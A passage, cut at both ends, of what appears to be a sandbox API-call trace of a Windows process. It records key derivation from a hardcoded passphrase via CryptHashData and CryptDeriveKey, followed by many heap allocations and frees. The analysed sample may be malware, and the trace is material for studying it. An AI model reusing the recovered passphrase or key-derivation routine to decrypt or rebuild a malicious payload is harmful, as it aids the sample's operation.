dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0134.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0134.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0134.565] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0134.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0134.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0134.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0134.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb000, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0134.566] CryptHashData (hHash=0x41ac700, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0134.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.566] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0134.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cafb8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0134.566] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac700, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac740) returned 1 [0134.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0134.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0134.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0134.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0134.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0134.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0134.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0134.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0134.568] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf58 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb000 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae20 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caeb0 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caec8 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadc0 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf70 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0134.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf88 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caef8 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafa0 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb048 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb078 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0134.569] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae38 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0134.569] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0134.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0134.570] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0134.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e28 [0134.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0134.570] CryptDestroyHash (hHash=0x41ac700) returned 1 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0134.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0134.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0134.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0134.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0134.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0134.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0134.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0134.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0134.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0134.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0134.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0134.572] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0134.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0134.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0134.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0134.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0134.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0134.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0134.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0134.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0134.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 